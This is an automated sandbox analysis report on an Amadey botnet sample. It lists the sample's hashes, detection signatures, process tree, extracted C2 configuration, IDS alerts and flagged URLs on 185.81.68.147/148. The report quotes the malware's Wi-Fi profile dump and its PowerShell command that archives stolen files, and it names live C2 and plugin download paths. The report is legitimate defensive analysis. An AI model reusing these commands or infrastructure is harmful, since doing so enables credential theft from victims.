Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tOuVwTJrau.exe

Overview

General Information

Sample name:tOuVwTJrau.exe
renamed because original name is a hash value
Original sample name:4962575a2378d5c72e7a836ea766e2ad.exe
Analysis ID:1574259
MD5:4962575a2378d5c72e7a836ea766e2ad
SHA1:549964178b12017622d3cbdda6dbfdef0904e7e2
SHA256:eff5fad47b9c739b09e760813b2bcbb0788eb35598f72e64ff95c794e72e6676
Tags:Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • tOuVwTJrau.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\tOuVwTJrau.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)
    • Gxtuum.exe (PID: 6968 cmdline: "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)
      • rundll32.exe (PID: 5004 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 1220 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
          • netsh.exe (PID: 4888 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6944 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rundll32.exe (PID: 3940 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 3272 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
          • netsh.exe (PID: 5460 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
            • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6896 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rundll32.exe (PID: 6828 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 888 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
  • Gxtuum.exe (PID: 7052 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)
  • Gxtuum.exe (PID: 6796 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)
  • Gxtuum.exe (PID: 2360 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}
SourceRuleDescriptionAuthorStrings
tOuVwTJrau.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              SourceRuleDescriptionAuthorStrings
              12.2.rundll32.exe.6c050000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                16.2.rundll32.exe.6c050000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                  20.2.Gxtuum.exe.e0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                    2.2.Gxtuum.exe.e0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                      22.2.Gxtuum.exe.e0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                        Click to see the 7 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 1220, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 1220, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 1220, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 1220, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 4888, ProcessName: netsh.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:47:05.831787+010028561471A Network Trojan was detected192.168.2.449736185.81.68.14780TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:47:08.802544+010028561481A Network Trojan was detected192.168.2.449739185.81.68.14880TCP
                        2024-12-13T07:47:14.878635+010028561481A Network Trojan was detected192.168.2.449750185.81.68.14880TCP
                        2024-12-13T07:47:21.332803+010028561481A Network Trojan was detected192.168.2.449757185.81.68.14880TCP
                        2024-12-13T07:47:27.441914+010028561481A Network Trojan was detected192.168.2.449762185.81.68.14880TCP
                        2024-12-13T07:47:33.552445+010028561481A Network Trojan was detected192.168.2.449766185.81.68.14880TCP
                        2024-12-13T07:47:39.660962+010028561481A Network Trojan was detected192.168.2.449770185.81.68.14880TCP
                        2024-12-13T07:47:45.832857+010028561481A Network Trojan was detected192.168.2.449774185.81.68.14880TCP
                        2024-12-13T07:47:51.971087+010028561481A Network Trojan was detected192.168.2.449782185.81.68.14880TCP
                        2024-12-13T07:47:58.126332+010028561481A Network Trojan was detected192.168.2.449786185.81.68.14880TCP
                        2024-12-13T07:48:04.221930+010028561481A Network Trojan was detected192.168.2.449792185.81.68.14880TCP
                        2024-12-13T07:48:10.290034+010028561481A Network Trojan was detected192.168.2.449811185.81.68.14880TCP
                        2024-12-13T07:48:16.362981+010028561481A Network Trojan was detected192.168.2.449830185.81.68.14880TCP
                        2024-12-13T07:48:22.439634+010028561481A Network Trojan was detected192.168.2.449846185.81.68.14880TCP
                        2024-12-13T07:48:28.519011+010028561481A Network Trojan was detected192.168.2.449863185.81.68.14880TCP
                        2024-12-13T07:48:34.644011+010028561481A Network Trojan was detected192.168.2.449882185.81.68.14880TCP
                        2024-12-13T07:48:40.970501+010028561481A Network Trojan was detected192.168.2.449900185.81.68.14880TCP
                        2024-12-13T07:48:47.051052+010028561481A Network Trojan was detected192.168.2.449920185.81.68.14880TCP
                        2024-12-13T07:48:53.239614+010028561481A Network Trojan was detected192.168.2.449938185.81.68.14880TCP
                        2024-12-13T07:48:59.678631+010028561481A Network Trojan was detected192.168.2.449953185.81.68.14880TCP
                        2024-12-13T07:49:05.786107+010028561481A Network Trojan was detected192.168.2.449970185.81.68.14880TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:47:11.952254+010028561501A Network Trojan was detected192.168.2.449746185.81.68.14880TCP
                        2024-12-13T07:47:11.973837+010028561501A Network Trojan was detected192.168.2.449747185.81.68.14880TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:47:15.970253+010028561511A Network Trojan was detected192.168.2.449752185.81.68.14880TCP
                        2024-12-13T07:47:16.063977+010028561511A Network Trojan was detected192.168.2.449753185.81.68.14880TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:47:05.846458+010028033053Unknown Traffic192.168.2.449738185.81.68.14780TCP
                        2024-12-13T07:47:11.583266+010028033053Unknown Traffic192.168.2.449743185.81.68.14780TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-13T07:47:10.493418+010028552391A Network Trojan was detected192.168.2.449741185.81.68.14780TCP
                        2024-12-13T07:47:10.515862+010028552391A Network Trojan was detected192.168.2.449742185.81.68.14780TCP
                        2024-12-13T07:47:11.952254+010028552391A Network Trojan was detected192.168.2.449746185.81.68.14880TCP
                        2024-12-13T07:47:11.973837+010028552391A Network Trojan was detected192.168.2.449747185.81.68.14880TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1tAvira URL Cloud: Label: malware
                        Source: http://185.81.68.147/7vhfjke3/index.php?wal=1ies.Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php&Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.php&Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.php$Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/XAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1hAvira URL Cloud: Label: malware
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php0Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpd7Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1Avira URL Cloud: Label: malware
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1zAvira URL Cloud: Label: malware
                        Source: http://185.81.68.147/7vhfjke3/index.php1Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.phpAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.php6Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/wsysAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.php8Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/SysWOW64Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/owsAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/Plugins/cred64.dllAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpodedAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpsAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpvAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpAvira URL Cloud: Label: malware
                        Source: http://185.81.68.147/7vhfjke3/index.php?wal=1H;0Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpz#29Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php98Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpbAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpaAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbSAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phphAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpfAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpgAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpXx/MAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpnAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpmAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpRAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpoAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpsAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpuAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnNAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpwAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpZAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/ta;Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1eBAvira URL Cloud: Label: malware
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpndowsAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpEAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpLAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.php?wal=1tesHAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpKAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpJAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/Fvu5jh4DbS/index.phpAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.php?wal=1urnAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.php?wal=1Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1bAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpbf198Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?RAvira URL Cloud: Label: malware
                        Source: http://185.81.68.147/7vhfjke3/index.php?wal=1fAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpAvira URL Cloud: Label: malware
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php:Avira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/Plugins/clip64.dllAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.147/7vhfjke3/index.phpXAvira URL Cloud: Label: phishing
                        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpdedAvira URL Cloud: Label: phishing
                        Source: tOuVwTJrau.exeMalware Configuration Extractor: Amadey {"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllReversingLabs: Detection: 34%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllReversingLabs: Detection: 47%
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllReversingLabs: Detection: 47%
                        Source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllReversingLabs: Detection: 34%
                        Source: tOuVwTJrau.exeVirustotal: Detection: 70%Perma Link
                        Source: tOuVwTJrau.exeReversingLabs: Detection: 65%
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeJoe Sandbox ML: detected
                        Source: tOuVwTJrau.exeJoe Sandbox ML: detected
                        Source: tOuVwTJrau.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: tOuVwTJrau.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2085742458.0000018FEDA2F000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: softy.pdb source: powershell.exe, 0000000B.00000002.2086071669.0000018FEDA37000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2086071669.0000018FEDA37000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: CallSite.Target.pdbn: source: powershell.exe, 0000000B.00000002.2086521310.0000018FEDA77000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2084376768.0000018FED9C5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A56-E329-4D4D1%0# source: powershell.exe, 0000000B.00000002.2086521310.0000018FEDA5D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.1.dr, cred64[1].dll.1.dr
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C05BD9F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,12_2_6C05BD9F
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                        Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49736 -> 185.81.68.147:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49739 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49741 -> 185.81.68.147:80
                        Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49742 -> 185.81.68.147:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49750 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.4:49753 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49746 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49766 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.4:49746 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49762 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49757 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49770 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.4:49752 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49747 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856150 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M6 : 192.168.2.4:49747 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49774 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49786 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49782 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49830 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49811 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49846 -> 185.81.68.148:80
                        Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49882 -> 185.81.68.148:80
